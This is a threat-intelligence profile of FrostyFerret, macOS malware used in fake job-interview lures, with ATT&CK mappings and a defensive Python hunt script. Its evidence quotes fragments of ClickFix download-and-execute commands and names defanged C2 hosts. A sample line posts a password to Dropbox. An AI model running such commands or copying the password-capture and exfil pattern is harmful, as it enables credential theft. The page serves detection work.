Mallory
Malware, used by 3 actors

FrostyFerret

FrostyFerret is a macOS-focused malware component associated with North Korean threat activity tracked as Lazarus, Contagious Interview, ClickFake Interview, WaterPlum, Famous Chollima, and BlockNovas-related operations. Public reporting describes it as part of fake job interview and video-assessment infection chains targeting cryptocurrency job seekers, software developers, and finance/technology personnel. In the March 2025 ClickFake Interview campaign, victims were lured via fake interview websites using ClickFix-style prompts; on macOS, a Bash installer downloaded and extracted malicious components, established LaunchAgent persistence, executed FrostyFerret, and then launched the GolangGhost backdoor. FrostyFerret was used to phish for the victim’s macOS system password by displaying a fake prompt claiming Chrome required camera/microphone access. Reporting states the entered password was exfiltrated to Dropbox even if empty or incorrect, and was likely intended for subsequent keychain access. Multiple sources place FrostyFerret alongside BeaverTail, InvisibleFerret, OtterCookie, and GolangGhost in DPRK-linked recruitment-themed malware operations, and later reporting notes BlockNovas used video assessments and ClickFix-related lures to distribute FrostyFerret and GolangGhost. High-confidence related artifacts mentioned in the content include a malicious archive named "nvidia-rc.update.zip" and reporting that port 8000 was used as a C2 port for the Golang FrostyFerret backdoor chain.


THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers.

ClickFake Interview

BlockNovas has been observed using video assessments to distribute FROSTYFERRET and GolangGhost using ClickFix-related lures...

via The Hacker News (thehackernews.com)
Lazarus

On macOS, a Bash script downloads and extracts malicious components, then executes FrostyFerret to steal the system password before launching GolangGhost.

via Sekoia blog (blog.sekoia.io)
Contagious Interview

“Analyzing the Malicious FrostyFerret Payload ‘nvidia-rc.update.zip’ … Port 8000 is a C2 port for the Golang Frostyferret Backdoor…”

via Silent Push blog (silentpush.com)
MITRE ATT&CK

Techniques & procedures

14 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques

T1566 Phishing (evidence: 3)

"...job-themed social engineering campaigns ... under the pretext of coding assignment or fixing an issue with their browser when turning on camera during a video assessment."

T1566.002 Spearphishing Link (evidence: 1)

“Job seekers were contacted to plan a video call for a job interview via LinkedIn or X… operators sending users a URL link on social media, inviting them to a fake cryptocurrency-related interview on a website.”

T1566.003 Spearphishing via Service (evidence: 2)

Multiple titles reference 'Contagious Interview,' 'fake developer job interviews,' 'LinkedIn recruiting scam,' 'Recruitment Emails,' and 'Job Offer' lures used to deliver BeaverTail, InvisibleFerret, OtterCookie, PylangGhost, and GolangGhost.

Execution

4 techniques

T1059 Command and Scripting Interpreter (evidence: 1)

“curl … && powershell -Command ‘Expand-Archive…’ && wscript …”; “cmd /c node nvidia.js”; “nohup bash /var/tmp/coremedia.sh …”

T1059.001 PowerShell (evidence: 1)

Windows command: “powershell -Command "Expand-Archive…" && wscript …update.vbs”

T1059.004 Unix Shell (evidence: 2)

Linux/macOS commands: “curl -k -o /var/tmp/nvidia_update.sh … && chmod +x … && bash …”

T1204 User Execution (evidence: 3)

“This is where the operator employs the ClickFix technique… commands to copy, paste, and run on their system… curl -k -o … && … && wscript …”

Persistence

1 technique

T1543.001 Launch Agent (evidence: 1)

“creates a plist file serving as a service, /Library/LaunchAgents/com.drive.plist, which points to a bash file named cloud.sh.”

Privilege Escalation

1 technique

T1543.001 Launch Agent (evidence: 1)

“creates a plist file serving as a service, /Library/LaunchAgents/com.drive.plist, which points to a bash file named cloud.sh.”

Stealth

1 technique

T1036 Masquerading (evidence: 1)

“download a driver to fix the issue… nvidiadrivers.zip… decoy archive containing a real driver”; “FrostyFerret uses the same icon as Chrome… claiming that Chrome needs access…”

Credential Access

2 techniques

T1056 Input Capture (evidence: 1)

“executes FrostyFerret… to retrieve the user’s system password… prompt requesting the user’s system password… password is exfiltrated to Dropbox. It is likely used after to access the user’s keychain.”

T1056.002 GUI Input Capture (evidence: 1)

“presents a fake window… followed by a prompt requesting the user’s system password… the password is exfiltrated to Dropbox. It is likely used after to access the user’s keychain.”

Collection

2 techniques

T1056 Input Capture (evidence: 1)

“executes FrostyFerret… to retrieve the user’s system password… prompt requesting the user’s system password… password is exfiltrated to Dropbox. It is likely used after to access the user’s keychain.”

T1056.002 GUI Input Capture (evidence: 1)

“presents a fake window… followed by a prompt requesting the user’s system password… the password is exfiltrated to Dropbox. It is likely used after to access the user’s keychain.”

Command and Control

2 techniques

T1071.001 Web Protocols (evidence: 1)

“domain… observed to be both a command and control (C2) and staging server… lianxinxiao[.]com:5000… /uploads /keys /check-running…”

T1105 Ingress Tool Transfer (evidence: 2)

“use the following curl command… download and execute a malicious bash script… or download a ZIP archive… fetches a ZIP archive named nvidiadrivers.zip hosted at… https://api.smartdriverfix[.]cloud/…”

Exfiltration

1 technique

T1567.002 Exfiltration to Cloud Storage (evidence: 1)

“the password is exfiltrated to Dropbox.”; YARA string: “content.dropboxapi.com/2/files/upload”
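As an added, defender-side illustration of the persistence and exfiltration artifacts quoted in the ATT&CK evidence above (the com.drive.plist LaunchAgent pointing at cloud.sh, the /var/tmp shell scripts, and the Dropbox upload endpoint), the following Python hunt helper is not code from any of the cited reports: it flags a LaunchAgent plist that runs a shell script from /var/tmp or with one of the quoted names, and scans a script body for the quoted exfil/C2 strings. The sample plist and script are constructed, and the /var/tmp/cloud.sh path is an assumption (the reports quoted here do not give the script's directory).

```python
import plistlib

# Script names and staging dir quoted in this page's ATT&CK evidence.
SUSPECT_SCRIPT_NAMES = {"cloud.sh", "coremedia.sh", "nvidia_update.sh"}
SUSPECT_DIRS = ("/var/tmp/",)
# Exfil and C2 strings from the page, with defanging brackets removed.
NETWORK_MARKERS = [
    "content.dropboxapi.com/2/files/upload",
    "lianxinxiao.com:5000",
    "api.smartdriverfix.cloud",
]

def launch_agent_findings(plist_bytes: bytes) -> list:
    """Reasons a LaunchAgent plist resembles the com.drive.plist persistence."""
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception:
        return ["unparseable plist"]
    program = plist.get("Program")
    candidates = [program] if isinstance(program, str) else []
    candidates += [a for a in plist.get("ProgramArguments", []) if isinstance(a, str)]
    reasons = []
    for path in candidates:
        name = path.rsplit("/", 1)[-1]
        if name in SUSPECT_SCRIPT_NAMES:
            reasons.append(f"references known script name {name}")
        if path.startswith(SUSPECT_DIRS):
            reasons.append(f"runs a program from a world-writable temp dir: {path}")
    if plist.get("RunAtLoad") and any(c.endswith(".sh") for c in candidates):
        reasons.append("RunAtLoad shell script")
    return reasons

def script_findings(text: str) -> list:
    """Exfil/C2 markers present in a shell script body (defanged or not)."""
    normalized = text.replace("[.]", ".")
    return [m for m in NETWORK_MARKERS if m in normalized]

# Constructed sample modelled on the quoted artifacts; not a real capture.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.drive</string>
<key>ProgramArguments</key><array><string>/bin/bash</string><string>/var/tmp/cloud.sh</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""
SAMPLE_SCRIPT = 'curl -X POST https://content.dropboxapi[.]com/2/files/upload -d "$PW"\n'

if __name__ == "__main__":
    print(launch_agent_findings(SAMPLE_PLIST))
    print(script_findings(SAMPLE_SCRIPT))
```

On a live host the same functions can be fed each file under /Library/LaunchAgents and ~/Library/LaunchAgents plus the scripts they reference; a hit is a triage lead, not proof, since legitimate agents also use RunAtLoad.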

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network: 8 tracked. IPs, domains, and DNS infrastructure linked to this family.

Hashes: 3 tracked. File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other: 3 tracked. Other indicator types observed in public reporting.
